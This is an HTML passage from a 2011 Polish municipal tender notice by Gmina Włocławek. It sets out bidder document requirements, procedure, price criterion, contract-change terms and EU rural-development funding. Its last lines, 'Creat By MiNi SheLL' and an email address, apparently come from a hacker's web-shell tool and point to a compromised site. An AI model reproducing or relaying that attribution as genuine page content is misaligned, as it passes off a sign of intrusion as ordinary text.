<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta powinna być sporządzono według wzoru formularza oferty. 
2) Wycena sporządzona w oparciu o kosztorys ofertowy .
3) Zaakceptowany projekt umowy podpisany na ostatniej stronie  z wyrazem Akceptuję  i parafowany na każdej stronie projektu umowy. 
4) Wstępny harmonogram rzeczowo- finansowy  - sporządzony , podpisany i zaakceptowany przez Wykonawcę .
Brak wstępnego harmonogramu robót jest podstawą do odrzucenia oferty w postępowaniu przetargowym.
5) Oświadczenie wykonawcy z art. 36 ust.4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych 
6) Wykonawcy którzy wspólnie ubiegają się o udzielenie zamówienia publicznego winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy 
7) Dowód wpłaty wadium .
8) Oświadczenie o dokonaniu wizji lokalnej i zapoznaniu się z dokumentacją projektową .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Umowa zostanie zawarta według wzoru stanowiącego załącznik do specyfikacji istotnych warunków zamówienia.
2. Wykonawca zobowiązany jest do wykonania umowy z należytą starannością.
3. Wykonawca będzie wykonywał zamówienie przy użyciu własnych materiałów, urządzeń i narzędzi.
4. W przypadku stwierdzenia rażących naruszeń umowy Zamawiający może odstąpić od umowy .
5..Wykonawca ponosi odpowiedzialność za działania osób, którym powierzył wykonanie zamówienia
6.  Roboty będą prowadzone zgodnie z harmonogramem stanowiącym załącznik do umowy. Wszelkie konsekwencje z tytułu odstępstwa od harmonogramu będą obciążały Wykonawcę robót.
7.  Wykonawca udzieli rękojmi za wykonane zamówienie na okres 36 miesięcy od odbioru końcowego.
8. Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku do treści oferty, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do  przewidzenia w chwili zawarcia umowy i określonych w rozdziale V Specyfikacji istotnych warunków zamówienia .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gmina.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Włocławek ul. Królewiecka 7, pok.nr 8 za odpłatnością 10,0 zł + VAT po wypełnieniu wniosku i wystawieniu faktury przez Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2011 godzina 09:00, miejsce: Urząd Gminy Włocławek ul. Królewiecka 7, 87-800 Włocławek pok nr 5 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Finansowanie projektu ze środków Unii Europejskiej - Inwestycja jest finansowana z środków Programu Rozwoju Obszarów Wiejskich (PROW) na lata 2007 - 2013 w ramach działania 313, 322, 323 Odnowa i rozwój wsi( pozytywna ocena wniosku).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com